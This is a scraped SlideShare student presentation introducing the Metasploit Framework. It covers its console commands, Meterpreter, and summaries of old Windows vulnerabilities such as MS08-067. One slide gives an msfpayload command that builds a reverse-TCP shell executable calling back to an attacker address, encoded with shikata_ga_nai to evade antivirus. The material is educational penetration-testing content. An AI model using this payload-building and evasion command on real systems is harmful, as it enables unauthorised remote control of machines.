SlideShare une entreprise Scribd logo

metaploit framework

Télécharger en tant que PPTX, PDF
Le Quyen
Le Quyen

This vulnerability allows remote code execution if a target receives a specially crafted RPC request. An attacker could exploit it without authentication to run arbitrary code on Windows 2000, XP, and 2003 systems. Best practices like firewalls can help protect networks from outside attacks. The vulnerability is caused by unchecked buffers in the LSASS service.

1  sur  19
Lê Đức Quyền 08130075 Cao Ngô Nhật thanh 08130081
• “The Metasploit Framework is an advanced open-source for attacking, testing, and using exploit code.” • Metasploit software helps security and IT professionals identify security issues, verify vulnerability in system. • Perform penetration tests • Overt penetration testing • Covert penetration testing • Consists of tools, libraries, modules, and user interfaces. These are configured and combined to launch an exploit. • Written in Ruby.
• Professional approach to penetration testing: – Automation – Reconnaissance, exploitation. • All in one Solution – Multi-platform – Diverse range of target applications • Open Source – Custom payloads
• Choose module exploit: • show exploits: list available exploits within the framework • use exploit_name: choose exploit • info exploit_name: view information about exploit • Choose payload • Show payloads: show only the payloads that are com-patible with chosen module. • Info payload_name: view detail information about payload • set payload payload_name: choose payload
• Configure chosen payload. • show options: view the options which you must configure • set option_name value: configure option • show advanceds: show advance options • check: verify options are configured whether exactly or not • show targets: list vulnerable potential targets. • set TARGET value: choose target. • exploit: initiates our exploit and attempts to attack the target
Meterpreter, short for The Meta -Interpreter is an advanced payload that is included in the Metaploit Framework. Its purpose is to provide complex command for exploiting and attacking remote machine. The way that it accomplishes this is by allowing developers to write their own extensions in the form of shared object (DLL) files that can be uploaded and injected into a running process on a target computer after exploitation has occurred.
• Fs: Provides interaction with the filesystem on the remote machine. • Net: Provides interaction with the network stack on the remote machine. • Process: Provides interaction with processes on the remote machine . • Sys: Provides interaction with the environment on the remote machine
• screenshot: capture desktop screen of victim • sysinfo: view information about platform of victim • meterpreter > sysinfo Computer: IHAZSECURITY OS : Windows XP (Build 2600, Service Pack 2). Arch : x86 Language: en_US
• execute: executes a process on the remote endpoint • kill: terminate one or more processes on the remote endpoint • Ps: list processes on the remote endpoint
Meterpreter> execute -f cmd –c execute: success, process id is 3516. execute: allocated channel 1 for new process. meterpreter> interact 1 interact: Switching to interactive console on 1... interact: Started interactive channel 1. Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:WINDOWS>ipconfig
• Encoding payload with MSFencode root@bt:/# msfpayload windows/shell_reverse_tcp LHOST=192.168.1.101 LPORT=31337 R |msfencode -e x86/shikata_ga_nai -t exe > /var/www/payload2.exe • Multi-encoding: allows the payload to be encoded several times to throw off antivirus programs
•Vulnerability in Server Service Could Allow Remote Code Execution (958644) •The vulnerability could allow remote code execution if an affected system received a specially crafted RPC request. On Microsoft Windows 2000, Windows XP, and Windows Server 2003 systems, an attacker could exploit this vulnerability without authentication to run arbitrary code. •Firewall best practices and standard default firewall configurations can help protect network resources from attacks that originate outside the enterprise perimeter. http://technet.microsoft.com/en-us/security/bulletin/ms08- 067
LSASS Vulnerability - CAN-2003-0533 Impact of vulnerability: Remote Code Execution An attacker who successfully exploited the most severe of these vulnerabilities could take complete control of an affected system, including installing programs; viewing, changing, or deleting data; or creating new accounts that have full privileges. This vulnerability is caused by an unchecked buffer in the LSASS service.
• This is a remote code execution vulnerability. An attacker who successfully exploited this vulnerability could take complete control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts. • Systems are only vulnerable to remote attack when sharing a printer and the remote attacker can access the printer share. •This vulnerability is caused when the Windows Print Spooler insufficiently restricts user permissions to access print spoolers. •Firewall best practices and standard default firewall configurations can help protect networks from attacks that originate outside the enterprise perimeter. Best practices recommend that systems that are connected to the Internet have a minimal number of ports exposed. •http://technet.microsoft.com/en-us/security/bulletin/MS10-061
• This vulnerability is caused by the Windows RPCSS service does not properly check message inputs under certain circumstances. After establishing a connection, an attacker could send a specially crafted malformed RPC message to cause the underlying Distributed Component Object Model (DCOM) process on the remote system to fail in such a way that arbitrary code could be executed. • To exploit this vulnerability, the attacker would require the ability to send a specially crafted request to port 135, 139, 445 or 593 or any other specifically configured RPC port on the remote machine. •Best practices recommend blocking all TCP/IP ports that are not actually being used
• A remote code execution vulnerability exists in the ActiveX control for the Snapshot Viewer for Microsoft Access. An attacker could exploit the vulnerability by constructing a specially crafted Web page. When a user views the Web page, the vulnerability could allow remote code execution. An attacker who successfully exploited this vulnerability could gain the same user rights as the logged-on user. • http://technet.microsoft.com/en- us/security/bulletin/MS08-041
metaploit framework

Recommandé

Metasploit Railguns presentation @ tcs hyderabad
Metasploit Railguns presentation @ tcs hyderabadMetasploit Railguns presentation @ tcs hyderabad
Metasploit Railguns presentation @ tcs hyderabadChaitanya krishna
 
Dealing with legacy code
Dealing with legacy codeDealing with legacy code
Dealing with legacy codeG Prachi
 
Telehack: May the Command Line Live Forever
Telehack: May the Command Line Live ForeverTelehack: May the Command Line Live Forever
Telehack: May the Command Line Live ForeverGregory Hanis
 
Hacker bootcamp
Hacker bootcampHacker bootcamp
Hacker bootcampGregory Hanis
 
Introduction To Exploitation & Metasploit
Introduction To Exploitation & MetasploitIntroduction To Exploitation & Metasploit
Introduction To Exploitation & MetasploitRaghav Bisht
 
Stuxnet - Case Study
Stuxnet - Case StudyStuxnet - Case Study
Stuxnet - Case StudyAmr Thabet
 
Csw2017 bazhaniuk exploring_yoursystemdeeper_updated
Csw2017 bazhaniuk exploring_yoursystemdeeper_updatedCsw2017 bazhaniuk exploring_yoursystemdeeper_updated
Csw2017 bazhaniuk exploring_yoursystemdeeper_updatedCanSecWest
 
Mission Critical Security in a Post-Stuxnet World Part 1
Mission Critical Security in a Post-Stuxnet World Part 1Mission Critical Security in a Post-Stuxnet World Part 1
Mission Critical Security in a Post-Stuxnet World Part 1Byres Security Inc.
 

Recommandé

Metasploit Railguns presentation @ tcs hyderabad
Metasploit Railguns presentation @ tcs hyderabadMetasploit Railguns presentation @ tcs hyderabad
Metasploit Railguns presentation @ tcs hyderabadChaitanya krishna
 
Dealing with legacy code
Dealing with legacy codeDealing with legacy code
Dealing with legacy codeG Prachi
 
Telehack: May the Command Line Live Forever
Telehack: May the Command Line Live ForeverTelehack: May the Command Line Live Forever
Telehack: May the Command Line Live ForeverGregory Hanis
 
Hacker bootcamp
Hacker bootcampHacker bootcamp
Hacker bootcampGregory Hanis
 
Introduction To Exploitation & Metasploit
Introduction To Exploitation & MetasploitIntroduction To Exploitation & Metasploit
Introduction To Exploitation & MetasploitRaghav Bisht
 
Stuxnet - Case Study
Stuxnet - Case StudyStuxnet - Case Study
Stuxnet - Case StudyAmr Thabet
 
Csw2017 bazhaniuk exploring_yoursystemdeeper_updated
Csw2017 bazhaniuk exploring_yoursystemdeeper_updatedCsw2017 bazhaniuk exploring_yoursystemdeeper_updated
Csw2017 bazhaniuk exploring_yoursystemdeeper_updatedCanSecWest
 
Mission Critical Security in a Post-Stuxnet World Part 1
Mission Critical Security in a Post-Stuxnet World Part 1Mission Critical Security in a Post-Stuxnet World Part 1
Mission Critical Security in a Post-Stuxnet World Part 1Byres Security Inc.
 
Basic Linux Security
Basic Linux SecurityBasic Linux Security
Basic Linux Securitypankaj009
 
Spectre & Meltdown
Spectre & MeltdownSpectre & Meltdown
Spectre & MeltdownMurray Security Services
 
I Heart Stuxnet
I Heart StuxnetI Heart Stuxnet
I Heart StuxnetGil Megidish
 
A Stuxnet for Mainframes
A Stuxnet for MainframesA Stuxnet for Mainframes
A Stuxnet for MainframesCheryl Biswas
 
Stuxnet mass weopan of cyber attack
Stuxnet mass weopan of cyber attackStuxnet mass weopan of cyber attack
Stuxnet mass weopan of cyber attackAjinkya Nikam
 
Stuxnet dc9723
Stuxnet dc9723Stuxnet dc9723
Stuxnet dc9723Iftach Ian Amit
 
Threats, Vulnerabilities & Security measures in Linux
Threats, Vulnerabilities & Security measures in LinuxThreats, Vulnerabilities & Security measures in Linux
Threats, Vulnerabilities & Security measures in LinuxAmitesh Bharti
 
Stuxnet flame
Stuxnet flameStuxnet flame
Stuxnet flameSantosh Khadsare
 
BlueHat v18 || The matrix has you - protecting linux using deception
BlueHat v18 || The matrix has you - protecting linux using deceptionBlueHat v18 || The matrix has you - protecting linux using deception
BlueHat v18 || The matrix has you - protecting linux using deceptionBlueHat Security Conference
 
Metasploit framework in Network Security
Metasploit framework in Network SecurityMetasploit framework in Network Security
Metasploit framework in Network SecurityAshok Reddy Medikonda
 
Linux Security
Linux SecurityLinux Security
Linux Securitynayakslideshare
 
Unix Security
Unix SecurityUnix Security
Unix Securityreplay21
 
On non existent 0-days, stable binary exploits and
On non existent 0-days, stable binary exploits andOn non existent 0-days, stable binary exploits and
On non existent 0-days, stable binary exploits andAlisa Esage Шевченко
 
Lecture malicious software
Lecture malicious softwareLecture malicious software
Lecture malicious softwarerajakhurram
 
Stuxnet
StuxnetStuxnet
Stuxnetbueno buono good
 
Stuxnet - More then a virus.
Stuxnet - More then a virus.Stuxnet - More then a virus.
Stuxnet - More then a virus.Hardeep Bhurji
 
Lecture 3
Lecture 3Lecture 3
Lecture 3Education
 
Metasploit (Module-1) - Getting Started With Metasploit
Metasploit (Module-1) - Getting Started With MetasploitMetasploit (Module-1) - Getting Started With Metasploit
Metasploit (Module-1) - Getting Started With MetasploitAnurag Srivastava
 
Nguyen Duc Thinh - Docker security in Dev Ops environment 2.0
Nguyen Duc Thinh - Docker security in Dev Ops environment 2.0Nguyen Duc Thinh - Docker security in Dev Ops environment 2.0
Nguyen Duc Thinh - Docker security in Dev Ops environment 2.0Security Bootcamp
 
Program and System Threats
Program and System ThreatsProgram and System Threats
Program and System ThreatsReddhi Basu
 
Qo s trên windows
Qo s trên windows Qo s trên windows
Qo s trên windows Le Quyen
 
Ldap
LdapLdap
LdapLe Quyen
 

Contenu connexe

Tendances

Basic Linux Security
Basic Linux SecurityBasic Linux Security
Basic Linux Securitypankaj009
 
A Stuxnet for Mainframes
A Stuxnet for MainframesA Stuxnet for Mainframes
A Stuxnet for MainframesCheryl Biswas
 
Stuxnet mass weopan of cyber attack
Stuxnet mass weopan of cyber attackStuxnet mass weopan of cyber attack
Stuxnet mass weopan of cyber attackAjinkya Nikam
 
Threats, Vulnerabilities & Security measures in Linux
Threats, Vulnerabilities & Security measures in LinuxThreats, Vulnerabilities & Security measures in Linux
Threats, Vulnerabilities & Security measures in LinuxAmitesh Bharti
 
BlueHat v18 || The matrix has you - protecting linux using deception
BlueHat v18 || The matrix has you - protecting linux using deceptionBlueHat v18 || The matrix has you - protecting linux using deception
BlueHat v18 || The matrix has you - protecting linux using deceptionBlueHat Security Conference
 
Metasploit framework in Network Security
Metasploit framework in Network SecurityMetasploit framework in Network Security
Metasploit framework in Network SecurityAshok Reddy Medikonda
 
Unix Security
Unix SecurityUnix Security
Unix Securityreplay21
 
On non existent 0-days, stable binary exploits and
On non existent 0-days, stable binary exploits andOn non existent 0-days, stable binary exploits and
On non existent 0-days, stable binary exploits andAlisa Esage Шевченко
 
Lecture malicious software
Lecture malicious softwareLecture malicious software
Lecture malicious softwarerajakhurram
 
Stuxnet - More then a virus.
Stuxnet - More then a virus.Stuxnet - More then a virus.
Stuxnet - More then a virus.Hardeep Bhurji
 
Metasploit (Module-1) - Getting Started With Metasploit
Metasploit (Module-1) - Getting Started With MetasploitMetasploit (Module-1) - Getting Started With Metasploit
Metasploit (Module-1) - Getting Started With MetasploitAnurag Srivastava
 
Nguyen Duc Thinh - Docker security in Dev Ops environment 2.0
Nguyen Duc Thinh - Docker security in Dev Ops environment 2.0Nguyen Duc Thinh - Docker security in Dev Ops environment 2.0
Nguyen Duc Thinh - Docker security in Dev Ops environment 2.0Security Bootcamp
 
Program and System Threats
Program and System ThreatsProgram and System Threats
Program and System ThreatsReddhi Basu
 

Tendances (20)

Basic Linux Security
Basic Linux SecurityBasic Linux Security
Basic Linux Security
 
Spectre & Meltdown
Spectre & MeltdownSpectre & Meltdown
Spectre & Meltdown
 
I Heart Stuxnet
I Heart StuxnetI Heart Stuxnet
I Heart Stuxnet
 
A Stuxnet for Mainframes
A Stuxnet for MainframesA Stuxnet for Mainframes
A Stuxnet for Mainframes
 
Stuxnet mass weopan of cyber attack
Stuxnet mass weopan of cyber attackStuxnet mass weopan of cyber attack
Stuxnet mass weopan of cyber attack
 
Stuxnet dc9723
Stuxnet dc9723Stuxnet dc9723
Stuxnet dc9723
 
Threats, Vulnerabilities & Security measures in Linux
Threats, Vulnerabilities & Security measures in LinuxThreats, Vulnerabilities & Security measures in Linux
Threats, Vulnerabilities & Security measures in Linux
 
Stuxnet flame
Stuxnet flameStuxnet flame
Stuxnet flame
 
BlueHat v18 || The matrix has you - protecting linux using deception
BlueHat v18 || The matrix has you - protecting linux using deceptionBlueHat v18 || The matrix has you - protecting linux using deception
BlueHat v18 || The matrix has you - protecting linux using deception
 
Metasploit framework in Network Security
Metasploit framework in Network SecurityMetasploit framework in Network Security
Metasploit framework in Network Security
 
Linux Security
Linux SecurityLinux Security
Linux Security
 
Unix Security
Unix SecurityUnix Security
Unix Security
 
On non existent 0-days, stable binary exploits and
On non existent 0-days, stable binary exploits andOn non existent 0-days, stable binary exploits and
On non existent 0-days, stable binary exploits and
 
Lecture malicious software
Lecture malicious softwareLecture malicious software
Lecture malicious software
 
Stuxnet
StuxnetStuxnet
Stuxnet
 
Stuxnet - More then a virus.
Stuxnet - More then a virus.Stuxnet - More then a virus.
Stuxnet - More then a virus.
 
Lecture 3
Lecture 3Lecture 3
Lecture 3
 
Metasploit (Module-1) - Getting Started With Metasploit
Metasploit (Module-1) - Getting Started With MetasploitMetasploit (Module-1) - Getting Started With Metasploit
Metasploit (Module-1) - Getting Started With Metasploit
 
Nguyen Duc Thinh - Docker security in Dev Ops environment 2.0
Nguyen Duc Thinh - Docker security in Dev Ops environment 2.0Nguyen Duc Thinh - Docker security in Dev Ops environment 2.0
Nguyen Duc Thinh - Docker security in Dev Ops environment 2.0
 
Program and System Threats
Program and System ThreatsProgram and System Threats
Program and System Threats
 

En vedette

Qo s trên windows
Qo s trên windows Qo s trên windows
Qo s trên windows Le Quyen
 
IE Memory Protector
IE Memory ProtectorIE Memory Protector
IE Memory Protector3S Labs
 
Packet analysis using wireshark
Packet analysis using wiresharkPacket analysis using wireshark
Packet analysis using wiresharkBasaveswar Kureti
 
Study: The Future of VR, AR and Self-Driving Cars
Study: The Future of VR, AR and Self-Driving CarsStudy: The Future of VR, AR and Self-Driving Cars
Study: The Future of VR, AR and Self-Driving CarsLinkedIn
 

En vedette (8)

Qo s trên windows
Qo s trên windows Qo s trên windows
Qo s trên windows
 
Ldap
LdapLdap
Ldap
 
IE Memory Protector
IE Memory ProtectorIE Memory Protector
IE Memory Protector
 
Browser exploit framework
Browser exploit frameworkBrowser exploit framework
Browser exploit framework
 
Packet analysis using wireshark
Packet analysis using wiresharkPacket analysis using wireshark
Packet analysis using wireshark
 
Kali net hunter
Kali net hunterKali net hunter
Kali net hunter
 
Pentesting ReST API
Pentesting ReST APIPentesting ReST API
Pentesting ReST API
 
Study: The Future of VR, AR and Self-Driving Cars
Study: The Future of VR, AR and Self-Driving CarsStudy: The Future of VR, AR and Self-Driving Cars
Study: The Future of VR, AR and Self-Driving Cars
 

Similaire à metaploit framework

Workshop on BackTrack live CD
Workshop on BackTrack live CDWorkshop on BackTrack live CD
Workshop on BackTrack live CDamiable_indian
 
Kunal - Introduction to BackTrack - ClubHack2008
Kunal - Introduction to BackTrack - ClubHack2008Kunal - Introduction to BackTrack - ClubHack2008
Kunal - Introduction to BackTrack - ClubHack2008ClubHack
 
Kunal - Introduction to backtrack - ClubHack2008
Kunal - Introduction to backtrack - ClubHack2008Kunal - Introduction to backtrack - ClubHack2008
Kunal - Introduction to backtrack - ClubHack2008ClubHack
 
How to measure your security response readiness?
How to measure your security response readiness?How to measure your security response readiness?
How to measure your security response readiness?Tomasz Jakubowski
 
unit 2 confinement techniques.pdf
unit 2 confinement techniques.pdfunit 2 confinement techniques.pdf
unit 2 confinement techniques.pdfRohitGautam261127
 
CISSP Week 14
CISSP Week 14CISSP Week 14
CISSP Week 14jemtallon
 
Exploits Attack on Windows Vulnerabilities
Exploits Attack on Windows VulnerabilitiesExploits Attack on Windows Vulnerabilities
Exploits Attack on Windows VulnerabilitiesAmit Kumbhar
 
Chapter 9 system penetration [compatibility mode]
Chapter 9 system penetration [compatibility mode]Chapter 9 system penetration [compatibility mode]
Chapter 9 system penetration [compatibility mode]Setia Juli Irzal Ismail
 
Finalppt metasploit
Finalppt metasploitFinalppt metasploit
Finalppt metasploitdevilback
 
Metasploit - Basic and Android Demo
Metasploit - Basic and Android DemoMetasploit - Basic and Android Demo
Metasploit - Basic and Android DemoArpit Agarwal
 
WannaCry (WannaCrypt) Ransomware - Advisory from CERT-IN
WannaCry (WannaCrypt) Ransomware - Advisory from CERT-INWannaCry (WannaCrypt) Ransomware - Advisory from CERT-IN
WannaCry (WannaCrypt) Ransomware - Advisory from CERT-INVijay Sarathy Rangayyan
 
Presentation Prepared By: Mohamad Almajali
Presentation Prepared By: Mohamad AlmajaliPresentation Prepared By: Mohamad Almajali
Presentation Prepared By: Mohamad Almajaliwebhostingguy
 
Honeycon2016-honeypot updates for public
Honeycon2016-honeypot updates for publicHoneycon2016-honeypot updates for public
Honeycon2016-honeypot updates for publicJulia Yu-Chin Cheng
 
Hacker Halted 2014 - Post-Exploitation After Having Remote Access
Hacker Halted 2014 - Post-Exploitation After Having Remote AccessHacker Halted 2014 - Post-Exploitation After Having Remote Access
Hacker Halted 2014 - Post-Exploitation After Having Remote AccessEC-Council
 

Similaire à metaploit framework (20)

Metasploit
MetasploitMetasploit
Metasploit
 
Metasploit
MetasploitMetasploit
Metasploit
 
Workshop on BackTrack live CD
Workshop on BackTrack live CDWorkshop on BackTrack live CD
Workshop on BackTrack live CD
 
Kunal - Introduction to BackTrack - ClubHack2008
Kunal - Introduction to BackTrack - ClubHack2008Kunal - Introduction to BackTrack - ClubHack2008
Kunal - Introduction to BackTrack - ClubHack2008
 
Kunal - Introduction to backtrack - ClubHack2008
Kunal - Introduction to backtrack - ClubHack2008Kunal - Introduction to backtrack - ClubHack2008
Kunal - Introduction to backtrack - ClubHack2008
 
Metasploit Demo
Metasploit DemoMetasploit Demo
Metasploit Demo
 
How to measure your security response readiness?
How to measure your security response readiness?How to measure your security response readiness?
How to measure your security response readiness?
 
Ch14 security
Ch14 securityCh14 security
Ch14 security
 
Botnets Attacks.pptx
Botnets Attacks.pptxBotnets Attacks.pptx
Botnets Attacks.pptx
 
unit 2 confinement techniques.pdf
unit 2 confinement techniques.pdfunit 2 confinement techniques.pdf
unit 2 confinement techniques.pdf
 
CISSP Week 14
CISSP Week 14CISSP Week 14
CISSP Week 14
 
Exploits Attack on Windows Vulnerabilities
Exploits Attack on Windows VulnerabilitiesExploits Attack on Windows Vulnerabilities
Exploits Attack on Windows Vulnerabilities
 
Chapter 9 system penetration [compatibility mode]
Chapter 9 system penetration [compatibility mode]Chapter 9 system penetration [compatibility mode]
Chapter 9 system penetration [compatibility mode]
 
Finalppt metasploit
Finalppt metasploitFinalppt metasploit
Finalppt metasploit
 
Metasploit - Basic and Android Demo
Metasploit - Basic and Android DemoMetasploit - Basic and Android Demo
Metasploit - Basic and Android Demo
 
WannaCry (WannaCrypt) Ransomware - Advisory from CERT-IN
WannaCry (WannaCrypt) Ransomware - Advisory from CERT-INWannaCry (WannaCrypt) Ransomware - Advisory from CERT-IN
WannaCry (WannaCrypt) Ransomware - Advisory from CERT-IN
 
Pentesting with linux
Pentesting with linuxPentesting with linux
Pentesting with linux
 
Presentation Prepared By: Mohamad Almajali
Presentation Prepared By: Mohamad AlmajaliPresentation Prepared By: Mohamad Almajali
Presentation Prepared By: Mohamad Almajali
 
Honeycon2016-honeypot updates for public
Honeycon2016-honeypot updates for publicHoneycon2016-honeypot updates for public
Honeycon2016-honeypot updates for public
 
Hacker Halted 2014 - Post-Exploitation After Having Remote Access
Hacker Halted 2014 - Post-Exploitation After Having Remote AccessHacker Halted 2014 - Post-Exploitation After Having Remote Access
Hacker Halted 2014 - Post-Exploitation After Having Remote Access
 

metaploit framework

  • 1. Lê Đức Quyền 08130075 Cao Ngô Nhật thanh 08130081
  • 2. • “The Metasploit Framework is an advanced open-source for attacking, testing, and using exploit code.” • Metasploit software helps security and IT professionals identify security issues, verify vulnerability in system. • Perform penetration tests • Overt penetration testing • Covert penetration testing • Consists of tools, libraries, modules, and user interfaces. These are configured and combined to launch an exploit. • Written in Ruby.
  • 3. • Professional approach to penetration testing: – Automation – Reconnaissance, exploitation. • All in one Solution – Multi-platform – Diverse range of target applications • Open Source – Custom payloads
  • 4.
  • 5. Choose module exploit: • show exploits: list available exploits within the framework • use exploit_name: choose exploit • info exploit_name: view information about exploit • Choose payload • Show payloads: show only the payloads that are com-patible with chosen module. • Info payload_name: view detail information about payload • set payload payload_name: choose payload
  • 6. • Configure chosen payload. • show options: view the options which you must configure • set option_name value: configure option • show advanceds: show advance options • check: verify options are configured whether exactly or not • show targets: list vulnerable potential targets. • set TARGET value: choose target. • exploit: initiates our exploit and attempts to attack the target
  • 7. Meterpreter, short for The Meta -Interpreter is an advanced payload that is included in the Metaploit Framework. Its purpose is to provide complex command for exploiting and attacking remote machine. The way that it accomplishes this is by allowing developers to write their own extensions in the form of shared object (DLL) files that can be uploaded and injected into a running process on a target computer after exploitation has occurred.
  • 8. • Fs: Provides interaction with the filesystem on the remote machine. • Net: Provides interaction with the network stack on the remote machine. • Process: Provides interaction with processes on the remote machine . • Sys: Provides interaction with the environment on the remote machine
  • 9. • screenshot: capture desktop screen of victim • sysinfo: view information about platform of victim • meterpreter > sysinfo Computer: IHAZSECURITY OS : Windows XP (Build 2600, Service Pack 2). Arch : x86 Language: en_US
  • 10. • execute: executes a process on the remote endpoint • kill: terminate one or more processes on the remote endpoint • Ps: list processes on the remote endpoint
  • 11. Meterpreter> execute -f cmd –c execute: success, process id is 3516. execute: allocated channel 1 for new process. meterpreter> interact 1 interact: Switching to interactive console on 1... interact: Started interactive channel 1. Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:WINDOWS>ipconfig
  • 12. • Encoding payload with MSFencode root@bt:/# msfpayload windows/shell_reverse_tcp LHOST=192.168.1.101 LPORT=31337 R |msfencode -e x86/shikata_ga_nai -t exe > /var/www/payload2.exe • Multi-encoding: allows the payload to be encoded several times to throw off antivirus programs
  • 13.
  • 14. •Vulnerability in Server Service Could Allow Remote Code Execution (958644) •The vulnerability could allow remote code execution if an affected system received a specially crafted RPC request. On Microsoft Windows 2000, Windows XP, and Windows Server 2003 systems, an attacker could exploit this vulnerability without authentication to run arbitrary code. •Firewall best practices and standard default firewall configurations can help protect network resources from attacks that originate outside the enterprise perimeter. http://technet.microsoft.com/en-us/security/bulletin/ms08- 067
  • 15. LSASS Vulnerability - CAN-2003-0533 Impact of vulnerability: Remote Code Execution An attacker who successfully exploited the most severe of these vulnerabilities could take complete control of an affected system, including installing programs; viewing, changing, or deleting data; or creating new accounts that have full privileges. This vulnerability is caused by an unchecked buffer in the LSASS service.
  • 16. • This is a remote code execution vulnerability. An attacker who successfully exploited this vulnerability could take complete control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts. • Systems are only vulnerable to remote attack when sharing a printer and the remote attacker can access the printer share. •This vulnerability is caused when the Windows Print Spooler insufficiently restricts user permissions to access print spoolers. •Firewall best practices and standard default firewall configurations can help protect networks from attacks that originate outside the enterprise perimeter. Best practices recommend that systems that are connected to the Internet have a minimal number of ports exposed. •http://technet.microsoft.com/en-us/security/bulletin/MS10-061
  • 17. • This vulnerability is caused by the Windows RPCSS service does not properly check message inputs under certain circumstances. After establishing a connection, an attacker could send a specially crafted malformed RPC message to cause the underlying Distributed Component Object Model (DCOM) process on the remote system to fail in such a way that arbitrary code could be executed. • To exploit this vulnerability, the attacker would require the ability to send a specially crafted request to port 135, 139, 445 or 593 or any other specifically configured RPC port on the remote machine. •Best practices recommend blocking all TCP/IP ports that are not actually being used
  • 18. • A remote code execution vulnerability exists in the ActiveX control for the Snapshot Viewer for Microsoft Access. An attacker could exploit the vulnerability by constructing a specially crafted Web page. When a user views the Web page, the vulnerability could allow remote code execution. An attacker who successfully exploited this vulnerability could gain the same user rights as the logged-on user. • http://technet.microsoft.com/en- us/security/bulletin/MS08-041

Notes de l'éditeur

  1. Interact 1:Bắt đầu một phiên làm việc với channel vừa thiết lập với remote machine 
  2. Snapshot Viewer for Microsoft AccessCriticalRemote Code ExecutionCriticalMicrosoft Office Access 2000CriticalRemote Code ExecutionCriticalMicrosoft Office Access 2002CriticalRemote Code ExecutionCriticalMicrosoft Office Access 2003CriticalRemote Code ExecutionCritical